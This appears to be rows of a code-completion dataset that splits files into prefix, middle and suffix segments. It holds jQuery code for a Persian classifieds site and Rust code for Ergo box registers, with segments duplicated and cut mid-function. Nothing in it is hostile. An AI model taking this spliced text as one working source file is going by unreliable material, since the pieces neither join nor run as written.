ThisSlide = parseInt($(this).attr('class').split("sl")[1])
$('.slider .handle li').removeClass('active');
$(this).addClass('active');
sliderRoll(ThisSlide)
})
//scroll to element
function scrollToElement(element ,gap) {
if (menu) {
gap = gap + 48
}
var distance = $(element).offset().top - $("html, body").scrollTop() - gap
$("html, body").animate({
scrollTop : distance
},'500');
}
//change order
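// Elements with the .order class carry o-l-N / o-m-N / o-s-N classes and are re-inserted next to the Nth direct child of <body> for the current breakpoint, e.g. class="order o-l-2 o-m-1 o-s-3".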
function changeOrder() {
$('body .order').each(function(){
var cl = $(this).attr('class')
if (window.innerWidth > 961) {
var order = cl[cl.search("o-l-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth > 720 && window.innerWidth < 960) {
var order = cl[cl.search("o-m-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth < 721) {
var order = cl[cl.search("o-s-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
})
}
//form Validator
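// Re-validates every required field on change/blur and keeps the form's submit button disabled while any required field is still empty or unchecked.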
$('form.validator label *').on('change blur', function(e) {
formValidator(e);
})
function formValidator(e) {
var input = e.currentTarget;
var form = e.currentTarget.form;
	var message = '<span class="errorMessage">پاسخ به این گزینه اجباری است.</span>'
//
for (var i = 0; i < form.length; i++) {
var value = form[i].value;
var required = $(form[i]).prop('required');
var checked = form[i].checked;
var type = form[i].type;
if (required) {
if (['text','email','phone','number','password', 'textarea'].indexOf(type) > -1) {
if (value === '') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['select'].indexOf(type) > -1) {
if (value === '' || value === '---' || value === 'لطفا انتخاب فرمایید') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['checkbox'].indexOf(type) > -1) {
if (!checked) {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
}
}
//
if ($(input).attr('validate') === 'false') {
$(input).closest('label').addClass('error');
if ($(input).closest('label').children('.errorMessage').length < 1) {
			$(input).closest('label').append(message)
}
}
if ($(input).attr('validate') === 'true') {
$(input).closest('label').removeClass('error');
$(input).closest('label').children('.errorMessage').remove()
}
var errors = 0
for (var i = 0; i < form.length; i++) {
if ($(form[i]).attr('validate') === 'false') {
			errors += 1
}
}
if (errors === 0) {
$(form).find('input[type=submit]').prop('disabled', false);
}else {
$(form).find('input[type=submit]').prop('disabled', true);
}
}
// currency field
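// The click handler clears the field; on change the first run of digits is grouped in threes and the currency unit is appended.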
$('input.currency').click(function(){
$(this).val('')
});
$('input.currency').change(function(){
var val = $(this).val().match(/\d+/)[0].replace(/\B(?=(\d{3})+(?!\d))/g, "٫");
$(this).val(val + ' ریال')
})
//Stats
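// Minimal bar chart: each .visit count gets a .bar whose height is scaled relative to the largest count in the list.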
function stats() {
maxH = "";
$('#stats ul li .visit').each(function(){
$(this).parent().append('<div class="bar"></div>');
if (parseInt($(this).text()) > maxH) {
maxH = parseInt($(this).text())
}
})
$('#stats ul li .visit').each(function(){
h = ((parseInt($(this).text()) / maxH)*100) + '%'
$(this).parent().children('.bar').height(h);
})
$('#stats ul li .bar').each(function(){
$(this).height($(this).height() - 60);
if ( $(this).height() < 1) {
$(this).height(2)
}
})
}
stats();
custom.js | //////////////////////////////////////////////////////////////////////////////////
$(document).ready(function(){
//IE
isIE = /*@cc_on!@*/false || !!document.documentMode;
if (isIE) {
$( 'header, footer, main, aside' ).each(function(){
$(this).replaceWith( '<div class="ie-' + $(this).prop("tagName").toLowerCase() + '">' + $( this ).html() + "</div>" );
})
$('.ie-main').addClass('clearfix')
}
//header
//header - searchbox
$('#headertools button[name=search]').click(function(){
$('input.topbarSearch').focus();
})
$('input.topbarSearch').focus(function(){
$('#headertools button[name=search]').hide();
$('#headertools button[name=close]').show();
$('#topbar .title').hide()
});
$('input.topbarSearch').focusout(function(){
$('#headertools button[name=search]').show();
$('#headertools button[name=close]').hide();
setTimeout(function(){
$('#topbar .title').fadeIn()
},500);
});
// slider
if ($('.slider').length) {
sliderBuild();
sliderRoll(1);
}
//order
changeOrder()
//pop menue
$('.popmenu').not('.popmenu.active').click(function(){
$('.popmenu').removeClass('active');
$(this).addClass('active');
})
$(document).on('click', function (e) {
if ($('.popmenu.active').length && $(e.target).closest('.popmenu.active').length === 0) {
$('.popmenu').removeClass('active');
}
});
// hash links
if (window.location.hash.length) {
setTimeout(function () {
aHash(window.location.hash)
}, 1000);
}else {
setTimeout(function () {
aHash()
}, 1000);
}
$("a[href^=#]").click(function( e ) {
e.preventDefault();
aHash($(this).attr('href'))
})
function aHash(hash) {
if (hash) {
hash = hash
}else{
hash = $('.director a[href^=#]').attr('href')
}
if (hash && hash.length> 1) {
console.log(hash);
$("a[href^=#]").removeClass('active');
$('a[href=' + hash + ']').addClass('active');
window.location.hash = hash;
$('main > *.active').removeClass('active');
var hash = $(hash).get(0)
$(hash).addClass('active');
}
}
//click Effect
$('.cfx').click(function(e){
var elm = $(this);
var width = ($(this).width() * 1.5)
var xPos = Math.floor(e.pageX - elm.offset().left);
var yPos = Math.floor(e.pageY - elm.offset().top);
pob = ~~(Math.random() * 10000)
$(this).append('<div id="bubble' + pob + '" class="bubbleWrap"></div>');
$('#bubble' + pob).append('<div class="bubble"></div>');
$('#bubble' + pob + ' .bubble').css({
'left': xPos - (width / 2),
'top': yPos - (width / 2),
'width': width,
'height': width,
'-webkit-transform' : 'scale(0)',
'-moz-transform' : 'scale(0)',
'-ms-transform' : 'scale(0)',
'-o-transform' : 'scale(0)',
'transform' : 'scale(0)'
})
setTimeout(function () {
$('#bubble' + pob + ' .bubble').addClass('active')
}, 100);
setTimeout(function(){
// $('#bubble' + pob).remove()
},1000)
});
// box scroll fix
$('.scrlfix').bind('mousewheel DOMMouseScroll', function(e) {
var scrollTo = null;
if (e.type == 'mousewheel') {
scrollTo = (e.originalEvent.wheelDelta * -.1);
}
else if (e.type == 'DOMMouseScroll') {
scrollTo = .1 * e.originalEvent.detail;
}
if (scrollTo) {
e.preventDefault();
$(this).scrollTop(scrollTo + $(this).scrollTop());
}
});
//Moble Mode
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
$(document).on('click', '#showmenu', function() {
$("#menu , #hidemenu").addClass("active");
$(this).removeClass("active");
$("#menu").offset({left: 0});
$("nav, #headertools").addClass("menu");
$('#topbar').append('<div id="dimmer"></div>');
$('html').css({'overflow':'hidden'});
$('body').append('<div id="menucover"></div>');
setTimeout(function () {
$('#dimmer').addClass('active');
$('#menucover').addClass('active');
}, 500);
})
$(document).on('click', '#dimmer ', function() {
$("#menu").removeClass("active");
$("#menu").offset({left: -250});
$("nav, #headertools").removeClass("menu");
$('html').css({'overflow':'auto'});
$("#showmenu").addClass("active");
$('#hidemenu').removeClass("active");
$(this).remove();
$('#menucover').remove();
});
$(document).on('click', '#hidemenu ', function() {
$("#dimmer").click();
});
// bazaar page
$('#ads .ad section').click(function(e){
if (e.target.nodeName != 'BUTTON') {
var target = $(this).closest('section').children('a').attr('href')
window.location.href = target
}
});
// bazaar page - filter bar
$('#filterbar button[name=list]').click(function(){
$('#filterbar button[name=grid]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
})
$('#filterbar button[name=grid]').click(function(){
$('#filterbar button[name=list]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
})
$('#filterbar button[name=filters]').click(function(){
$(this).toggleClass('active');
$('#filters').toggleClass('active');
})
$('#filterbar button[name=sort]').click(function(){
$(this).toggleClass('active');
$('#sort').toggleClass('active');
})
$('#sort, #filters').children('button[name=close]').click(function(){
var name = $(this).closest('section').attr('id');
$('#filterbar button[name=' + name + ']').click();
})
//ad page
$('#adGalleryList .thumbnail').click(function(){
$('#adGalleryList .thumbnail').removeClass('active');
$(this).addClass('active');
var src = $(this).attr('imgsrc')
$('#adGallerySelected').css({'background':'url(' + src + ')'})
})
// bookmark button
$('button[name=bookmark]').click(function(){
alert('Bookmark Test')
})
//forms
$('input[name=resetpassword]').click(function(){
$('#password-reset').show()
$(this).hide()
})
// image selectors
$(document).on('change', 'input[type=file]', function() {
if (this.files && this.files[0]) {
var target = '.' + $(this).attr('t')
var reader = new FileReader();
reader.onload = function (e) {
$(target).css({'background': 'url(' + e.target.result + ')'}).show();
};
reader.readAsDataURL(this.files[0]);
}
})
//image add
imgNum = $('.box.pics div').length + 1;
$('input[name=addPicture]').click(function(){
if (imgNum < 5) {
var fieldset = $(this).closest('fieldset').get(0)
var box = $(fieldset).children('.box')
$(fieldset).append('<input type="file" name="adp-' + imgNum + '" accept="image/*" t="adp-' + imgNum + '" >')
$(box).removeClass('hidden').append('<div style="display:none;" class="adp-' + imgNum + '"><i ></i></div>')
$('input[name=adp-' + imgNum + ']').click();
imgNum = imgNum + 1;
}else{
alert('شما حداکثر مجاز به انتخاب چهار تصویر برای هر آگهی هستید!')
}
})
// image remove
$(document).on('click', '.box > div ', function() {
$(this).remove()
$('input[name=' + $(this).attr('class') + ']').remove();
imgNum = imgNum - 1;
$('input[name=addPicture]').prop('disabled', false);
//
var input = $('body input[name^=adp]');
for (var i = 0; i < input.length; i++) {
var element = input[i]
$(element).attr('name', 'adp-' + (i+1)).attr('t' , 'adp-' + (i+1))
}
var image = $('body .box.pics div');
for (var i = 0; i < image.length; i++) {
var element = image[i]
$(element).attr('class' , 'adp-' + (i+1))
}
});
});
//////////////////////////////////////////////////////////////////////////////////
$(window).resize(function(){
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
if ($('.slider').length) {
sliderResize()
}
changeOrder()
});
//////////////////////////////////////////////////////////////////////////////////
menu = false
//Moble mode
function mobileModeStart() {
if (menu !== true && $('body.msg').length < 1) {
mobileMenuBuild();
listHorizontaller()
filterbarMobile()
}
}
function mobileModeEnd() {
if (menu) {
mobileMenuremover();
listVerticaller()
filterbarNormal()
}
}
function mobileMenuBuild() {
$('#headertools').wrap( '<div class="clearfix" id="menu"></div>' );
$('nav, #footersitemap, #footersocials').appendTo('#menu');
$('body').append('<button id="showmenu" title="منو" type="button" class="icon cfx active" name="menu"></button>');
$('body').append('<button id="hidemenu" title="بستن" type="button" class="icon cfx" name="menu"></button>');
menu = true;
}
function mobileMenuremover() {
$('nav, #headertools').unwrap();
$('#showmenu, #hidemenu').remove();
if (isIE) {
$('#footersitemap, #footersocials').appendTo('.ie-footer');
}else {
$('#footersitemap, #footersocials').appendTo('footer');
}
menu = false;
}
function listHorizontaller() {
$('#popularbazaar ul, #newbazaar ul').wrap( '<div class="wrap"></div>' );
$( "#popularbazaar .wrap, #newbazaar .wrap" ).each(function(){
$(this).scrollLeft($(this).children('ul').width())
})
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).width($(this).children('li').length * 155);
})
}
function listVerticaller() {
$( "#popularbazaar ul, #newbazaar ul" ).unwrap()
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).css({'width':'auto'});
})
}
function filterbarMobile() {
$('#filterbar button[name=grid]').removeClass('active');
$('#filterbar button[name=list]').addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
}
function filterbarNormal() {
$('#filterbar button[name=list]').removeClass('active');
$('#filterbar button[name=grid]').addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
}
// slider
function sliderBuild() {
numOfSlides = $('.slides .slide').length
$('.slider').append('<ul class="handle"></ul>')
for (var i = 1; i < numOfSlides + 1; i++) {
$('.slider .handle').append('<li class="sl' + i + '"></li>')
}
$('.slider').append('<div class="slh handle-next">Next</div><div class="slh handle-prev">Prev</div>')
$('.sl1').addClass('active');
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
}
function sliderResize() {
setTimeout(function () {
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
var num = parseInt($('.handle li.active').attr('class').split("sl")[1])
if (num === numOfSlides) {
num = 1
}
clearTimeout(timer);
$('.slider .handle li').removeClass('active');
$('.slider .sl' + num).addClass('active');
sliderRoll(num)
}, 700);
}
function sliderRoll(num) {
var move = (num - 1) * $('.slide')[0].getBoundingClientRect().height
$('.slides').animate({scrollTop : move},'1000')
$('.slider .handle li').removeClass('next').html('');
$('.slider .handle li').removeClass('prev').html('');
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
$('.slider .handle li.sl' + (num - 1)).addClass('prev').html('');
timer = setTimeout(function(){
if (num === numOfSlides) {
num = 0
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
}
$('.slider .sl' + (num + 1)).click()
},10000);
num + 1
} | clearTimeout(timer);
ThisSlide = parseInt($(this).attr('class').split("sl")[1])
$('.slider .handle li').removeClass('active');
$(this).addClass('active');
sliderRoll(ThisSlide)
})
//scroll to element
function scrollToElement(element ,gap) {
if (menu) {
gap = gap + 48
}
var distance = $(element).offset().top - $("html, body").scrollTop() - gap
$("html, body").animate({
scrollTop : distance
},'500');
}
//change order
function changeOrder() {
$('body .order').each(function(){
var cl = $(this).attr('class')
if (window.innerWidth > 960) {
var order = cl[cl.search("o-l-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth > 720 && window.innerWidth < 961) {
var order = cl[cl.search("o-m-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth < 721) {
var order = cl[cl.search("o-s-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
})
}
//form Validator
$('form.validator label *').on('change blur', function(e) {
formValidator(e);
})
function formValidator(e) {
var input = e.currentTarget;
var form = e.currentTarget.form;
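// Persian message below: "Answering this field is required."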
var massage = '<span class="errorMessage">پاسخ به این گزینه اجباری است.</span>'
//
for (var i = 0; i < form.length; i++) {
var value = form[i].value;
var required = $(form[i]).prop('required');
var checked = form[i].checked;
var type = form[i].type;
if (required) {
if (['text','email','phone','number','password', 'textarea'].indexOf(type) > -1) {
if (value === '') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['select'].indexOf(type) > -1) {
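// 'لطفا انتخاب فرمایید' is the select placeholder option, Persian for "Please select"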
if (value === '' || value === '---' || value === 'لطفا انتخاب فرمایید') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['checkbox'].indexOf(type) > -1) {
if (!checked) {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
}
}
//
if ($(input).attr('validate') === 'false') {
$(input).closest('label').addClass('error');
if ($(input).closest('label').children('.errorMessage').length < 1) {
$(input).closest('label').append(massage)
}
}
if ($(input).attr('validate') === 'true') {
$(input).closest('label').removeClass('error');
$(input).closest('label').children('.errorMessage').remove()
}
var errors = 0
for (var i = 0; i < form.length; i++) {
if ($(form[i]).attr('validate') === 'false') {
errors += 1
}
}
if (errors === 0) {
$(form).find('input[type=submit]').prop('disabled', false);
}else {
$(form).find('input[type=submit]').prop('disabled', true);
}
}
// currency field
$('input.currency').click(function(){
$(this).val('')
});
$('input.currency').change(function(){
var val = $(this).val().match(/\d+/)[0].replace(/\B(?=(\d{3})+(?!\d))/g, "٫");
$(this).val(val + ' ریال')
})
//Stats
function stats() {
maxH = "";
$('#stats ul li .visit').each(function(){
$(this).parent().append('<div class="bar"></div>');
if (parseInt($(this).text()) > maxH) {
maxH = parseInt($(this).text())
}
})
$('#stats ul li .visit').each(function(){
h = ((parseInt($(this).text()) / maxH)*100) + '%'
$(this).parent().children('.bar').height(h);
})
$('#stats ul li .bar').each(function(){
$(this).height($(this).height() - 60);
if ( $(this).height() < 1) {
$(this).height(2)
}
})
}
stats(); | $(document).on('click', '.slider .handle li', function() { | random_line_split |
register.rs | //! Box registers
use crate::mir::constant::Constant;
use crate::mir::expr::Expr;
use crate::serialization::sigma_byte_reader::SigmaByteRead;
use crate::serialization::sigma_byte_writer::SigmaByteWrite;
use crate::serialization::SigmaParsingError;
use crate::serialization::SigmaSerializable;
use crate::serialization::SigmaSerializationError;
use crate::serialization::SigmaSerializeResult;
use ergo_chain_types::Base16EncodedBytes;
use std::convert::TryInto;
use std::{collections::HashMap, convert::TryFrom};
use thiserror::Error;
mod id;
pub use id::*;
mod value;
pub use value::*;
/// Stores non-mandatory registers for the box
#[derive(PartialEq, Eq, Debug, Clone)]
#[cfg_attr(feature = "json", derive(serde::Serialize, serde::Deserialize))]
#[cfg_attr(
feature = "json",
serde(
into = "HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>",
try_from = "HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>"
)
)]
pub struct NonMandatoryRegisters(Vec<RegisterValue>);
impl NonMandatoryRegisters {
/// Maximum number of non-mandatory registers
pub const MAX_SIZE: usize = NonMandatoryRegisterId::NUM_REGS;
/// Empty non-mandatory registers
pub fn empty() -> NonMandatoryRegisters {
NonMandatoryRegisters(vec![])
}
/// Create new from map
pub fn new(
regs: HashMap<NonMandatoryRegisterId, Constant>,
) -> Result<NonMandatoryRegisters, NonMandatoryRegistersError> {
NonMandatoryRegisters::try_from(
regs.into_iter()
.map(|(k, v)| (k, v.into()))
.collect::<HashMap<NonMandatoryRegisterId, RegisterValue>>(),
)
}
/// Size of non-mandatory registers set
pub fn len(&self) -> usize {
self.0.len()
}
/// Return true if non-mandatory registers set is empty
pub fn is_empty(&self) -> bool {
self.0.is_empty()
}
/// Get register value (returns None, if there is no value for the given register id)
pub fn get(&self, reg_id: NonMandatoryRegisterId) -> Option<&RegisterValue> {
self.0.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
}
/// Get register value as a Constant
/// returns None if there is no value for the given register id, or an error if the value is unparseable
pub fn get_constant(
&self,
reg_id: NonMandatoryRegisterId,
) -> Result<Option<Constant>, RegisterValueError> {
match self
.0
.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
{
Some(rv) => match rv.as_constant() {
Ok(c) => Ok(Some(c.clone())),
Err(e) => Err(e),
},
None => Ok(None),
}
}
}
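// --- Illustrative usage sketch (editor's addition; not part of the original source) ---
// Shows how a caller might build registers from a map and read a value back.
// The `1i32.into()` conversion mirrors what this file's own tests use.
//
//     use std::collections::HashMap;
//
//     let mut map: HashMap<NonMandatoryRegisterId, Constant> = HashMap::new();
//     map.insert(NonMandatoryRegisterId::R4, 1i32.into());
//     let regs = NonMandatoryRegisters::new(map).unwrap();
//     assert_eq!(
//         regs.get_constant(NonMandatoryRegisterId::R4).unwrap(),
//         Some(1i32.into())
//     );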
/// Create new from ordered values (first element will be R4, and so on)
impl TryFrom<Vec<RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<RegisterValue>) -> Result<Self, Self::Error> {
if values.len() > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(values.len()))
} else {
Ok(NonMandatoryRegisters(values))
}
}
}
impl TryFrom<Vec<Constant>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<Constant>) -> Result<Self, Self::Error> {
NonMandatoryRegisters::try_from(
values
.into_iter()
.map(RegisterValue::Parsed)
.collect::<Vec<RegisterValue>>(),
)
}
}
impl SigmaSerializable for NonMandatoryRegisters {
fn sigma_serialize<W: SigmaByteWrite>(&self, w: &mut W) -> SigmaSerializeResult {
let regs_num = self.len();
w.put_u8(regs_num as u8)?;
for (idx, reg_value) in self.0.iter().enumerate() {
match reg_value {
RegisterValue::Parsed(c) => c.sigma_serialize(w)?,
RegisterValue::ParsedTupleExpr(t) => t.to_tuple_expr().sigma_serialize(w)?,
RegisterValue::Invalid { bytes, error_msg } => {
let bytes_str = base16::encode_lower(bytes);
return Err(SigmaSerializationError::NotSupported(format!("unparseable register value at {0:?} (parsing error: {error_msg}) cannot be serialized in the stream (writer), because it cannot be parsed later. Register value as base16-encoded bytes: {bytes_str}", NonMandatoryRegisterId::get_by_zero_index(idx))));
}
};
}
Ok(())
}
fn sigma_parse<R: SigmaByteRead>(r: &mut R) -> Result<Self, SigmaParsingError> {
let regs_num = r.get_u8()?;
let mut additional_regs = Vec::with_capacity(regs_num as usize);
for idx in 0..regs_num {
let expr = Expr::sigma_parse(r)?;
let reg_val = match expr {
Expr::Const(c) => RegisterValue::Parsed(c),
Expr::Tuple(t) => {
RegisterValue::ParsedTupleExpr(EvaluatedTuple::new(t).map_err(|e| {
RegisterValueError::UnexpectedRegisterValue(format!(
"error parsing tuple expression from register {0:?}: {e}",
RegisterId::try_from(idx)
))
})?)
}
_ => {
return Err(RegisterValueError::UnexpectedRegisterValue(format!(
"invalid register ({0:?}) value: {expr:?} (expected Constant or Tuple)",
RegisterId::try_from(idx)
))
.into())
}
};
additional_regs.push(reg_val);
}
Ok(additional_regs.try_into()?)
}
}
/// Possible errors when building NonMandatoryRegisters
#[derive(Error, PartialEq, Eq, Clone, Debug)]
pub enum NonMandatoryRegistersError {
/// Set of registers has invalid size (maximum [`NonMandatoryRegisters::MAX_SIZE`])
#[error("invalid non-mandatory registers size ({0})")]
InvalidSize(usize),
/// Set of non-mandatory indexes are not densely packed
#[error("registers are not densely packed (register R{0} is missing)")]
NonDenselyPacked(u8),
}
impl From<NonMandatoryRegisters>
for HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>
{
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_value)| {
(
NonMandatoryRegisterId::get_by_zero_index(i),
// no way of returning an error without writing custom JSON serializer
#[allow(clippy::unwrap_used)]
Base16EncodedBytes::new(®_value.sigma_serialize_bytes()),
)
})
.collect()
}
}
impl From<NonMandatoryRegisters> for HashMap<NonMandatoryRegisterId, RegisterValue> {
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_val)| (NonMandatoryRegisterId::get_by_zero_index(i), reg_val))
.collect()
}
}
impl TryFrom<HashMap<NonMandatoryRegisterId, RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(
reg_map: HashMap<NonMandatoryRegisterId, RegisterValue>,
) -> Result<Self, Self::Error> {
let regs_num = reg_map.len();
if regs_num > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(regs_num))
} else {
let mut res: Vec<RegisterValue> = vec![];
NonMandatoryRegisterId::REG_IDS
.iter()
.take(regs_num)
.try_for_each(|reg_id| match reg_map.get(reg_id) {
Some(v) => Ok(res.push(v.clone())),
None => Err(NonMandatoryRegistersError::NonDenselyPacked(*reg_id as u8)),
})?;
Ok(NonMandatoryRegisters(res))
}
} | impl TryFrom<HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>>
for NonMandatoryRegisters
{
type Error = NonMandatoryRegistersError;
fn try_from(
value: HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>,
) -> Result<Self, Self::Error> {
let cm: HashMap<NonMandatoryRegisterId, RegisterValue> =
value.into_iter().map(|(k, v)| (k, v.into())).collect();
NonMandatoryRegisters::try_from(cm)
}
}
impl From<NonMandatoryRegistersError> for SigmaParsingError {
fn from(error: NonMandatoryRegistersError) -> Self {
SigmaParsingError::Misc(error.to_string())
}
}
#[allow(clippy::unwrap_used)]
#[cfg(feature = "arbitrary")]
pub(crate) mod arbitrary {
use super::*;
use proptest::{arbitrary::Arbitrary, collection::vec, prelude::*};
#[derive(Default)]
pub struct ArbNonMandatoryRegistersParams {
pub allow_unparseable: bool,
}
impl Arbitrary for NonMandatoryRegisters {
type Parameters = ArbNonMandatoryRegistersParams;
type Strategy = BoxedStrategy<Self>;
fn arbitrary_with(params: Self::Parameters) -> Self::Strategy {
vec(
if params.allow_unparseable {
prop_oneof![
any::<Constant>().prop_map(RegisterValue::Parsed),
vec(any::<u8>(), 0..100).prop_map({
|bytes| RegisterValue::Invalid {
bytes,
error_msg: "unparseable".to_string(),
}
})
]
.boxed()
} else {
any::<Constant>().prop_map(RegisterValue::Parsed).boxed()
},
0..=NonMandatoryRegisterId::NUM_REGS,
)
.prop_map(|reg_values| NonMandatoryRegisters::try_from(reg_values).unwrap())
.boxed()
}
}
}
#[allow(clippy::panic)]
#[allow(clippy::unwrap_used)]
#[allow(clippy::expect_used)]
#[cfg(test)]
mod tests {
use super::*;
use crate::serialization::sigma_serialize_roundtrip;
use proptest::prelude::*;
proptest! {
#[test]
fn hash_map_roundtrip(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
let regs_from_map = NonMandatoryRegisters::try_from(hash_map);
prop_assert![regs_from_map.is_ok()];
prop_assert_eq![regs_from_map.unwrap(), regs];
}
#[test]
fn get(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
hash_map.keys().try_for_each(|reg_id| {
prop_assert_eq![®s.get_constant(*reg_id).unwrap().unwrap(), hash_map.get(reg_id).unwrap().as_constant().unwrap()];
Ok(())
})?;
}
#[test]
fn reg_id_from_byte(reg_id_byte in 0i8..NonMandatoryRegisterId::END_INDEX as i8) {
assert!(RegisterId::try_from(reg_id_byte).is_ok());
}
#[test]
fn ser_roundtrip(regs in any::<NonMandatoryRegisters>()) {
prop_assert_eq![sigma_serialize_roundtrip(®s), regs];
}
}
#[test]
fn test_empty() {
assert!(NonMandatoryRegisters::empty().is_empty());
}
#[test]
fn test_non_densely_packed_error() {
let mut hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = HashMap::new();
let c: Constant = 1i32.into();
hash_map.insert(NonMandatoryRegisterId::R4, c.clone().into());
// gap, missing R5
hash_map.insert(NonMandatoryRegisterId::R6, c.into());
assert!(NonMandatoryRegisters::try_from(hash_map).is_err());
}
} | }
#[cfg(feature = "json")] | random_line_split |
register.rs | //! Box registers
use crate::mir::constant::Constant;
use crate::mir::expr::Expr;
use crate::serialization::sigma_byte_reader::SigmaByteRead;
use crate::serialization::sigma_byte_writer::SigmaByteWrite;
use crate::serialization::SigmaParsingError;
use crate::serialization::SigmaSerializable;
use crate::serialization::SigmaSerializationError;
use crate::serialization::SigmaSerializeResult;
use ergo_chain_types::Base16EncodedBytes;
use std::convert::TryInto;
use std::{collections::HashMap, convert::TryFrom};
use thiserror::Error;
mod id;
pub use id::*;
mod value;
pub use value::*;
/// Stores non-mandatory registers for the box
#[derive(PartialEq, Eq, Debug, Clone)]
#[cfg_attr(feature = "json", derive(serde::Serialize, serde::Deserialize))]
#[cfg_attr(
feature = "json",
serde(
into = "HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>",
try_from = "HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>"
)
)]
pub struct NonMandatoryRegisters(Vec<RegisterValue>);
impl NonMandatoryRegisters {
/// Maximum number of non-mandatory registers
pub const MAX_SIZE: usize = NonMandatoryRegisterId::NUM_REGS;
/// Empty non-mandatory registers
pub fn empty() -> NonMandatoryRegisters {
NonMandatoryRegisters(vec![])
}
/// Create new from map
pub fn new(
regs: HashMap<NonMandatoryRegisterId, Constant>,
) -> Result<NonMandatoryRegisters, NonMandatoryRegistersError> |
/// Size of non-mandatory registers set
pub fn len(&self) -> usize {
self.0.len()
}
/// Return true if non-mandatory registers set is empty
pub fn is_empty(&self) -> bool {
self.0.is_empty()
}
/// Get register value (returns None, if there is no value for the given register id)
pub fn get(&self, reg_id: NonMandatoryRegisterId) -> Option<&RegisterValue> {
self.0.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
}
/// Get register value as a Constant
/// returns None if there is no value for the given register id, or an error if the value is unparseable
pub fn get_constant(
&self,
reg_id: NonMandatoryRegisterId,
) -> Result<Option<Constant>, RegisterValueError> {
match self
.0
.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
{
Some(rv) => match rv.as_constant() {
Ok(c) => Ok(Some(c.clone())),
Err(e) => Err(e),
},
None => Ok(None),
}
}
}
/// Create new from ordered values (first element will be R4, and so on)
impl TryFrom<Vec<RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<RegisterValue>) -> Result<Self, Self::Error> {
if values.len() > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(values.len()))
} else {
Ok(NonMandatoryRegisters(values))
}
}
}
impl TryFrom<Vec<Constant>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<Constant>) -> Result<Self, Self::Error> {
NonMandatoryRegisters::try_from(
values
.into_iter()
.map(RegisterValue::Parsed)
.collect::<Vec<RegisterValue>>(),
)
}
}
impl SigmaSerializable for NonMandatoryRegisters {
fn sigma_serialize<W: SigmaByteWrite>(&self, w: &mut W) -> SigmaSerializeResult {
let regs_num = self.len();
w.put_u8(regs_num as u8)?;
for (idx, reg_value) in self.0.iter().enumerate() {
match reg_value {
RegisterValue::Parsed(c) => c.sigma_serialize(w)?,
RegisterValue::ParsedTupleExpr(t) => t.to_tuple_expr().sigma_serialize(w)?,
RegisterValue::Invalid { bytes, error_msg } => {
let bytes_str = base16::encode_lower(bytes);
